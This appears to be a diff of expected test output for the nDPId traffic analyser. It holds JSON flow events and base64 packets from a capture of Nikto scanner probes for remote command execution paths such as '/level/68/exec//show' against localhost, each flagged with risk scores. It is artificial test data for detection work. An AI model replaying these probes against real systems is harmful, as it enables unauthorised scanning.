+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}}
